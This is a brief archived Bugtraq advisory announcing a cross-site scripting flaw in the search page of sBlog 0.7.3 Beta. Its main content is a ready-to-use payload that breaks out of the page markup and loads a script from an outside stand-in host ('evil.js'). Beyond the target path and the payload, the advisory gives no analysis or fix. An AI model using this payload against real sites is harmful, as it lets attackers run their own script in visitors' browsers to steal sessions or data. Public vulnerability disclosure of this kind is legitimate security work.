sBlog 0.7.3 Beta XSS Vulnerabilitie

From: Guns@0x90.com.ar
To: bugtraq@securityfocus.com
Cc:
Subject: sBlog 0.7.3 Beta XSS Vulnerabilitie
Date:


# sBlog 0.7.3 Beta  XSS Vulnerabilitie
# Found by 0x90
# www.0x90.com.ar
# msn & mail: Guns@0x90.com.ar


# in blog
http://host/blog/search.php

# use

'"/></><script src=http://yoursite.com/evil.js>

# Welcome to the jungle!





Copyright © 1995-2020 LinuxRocket.net. All rights reserved.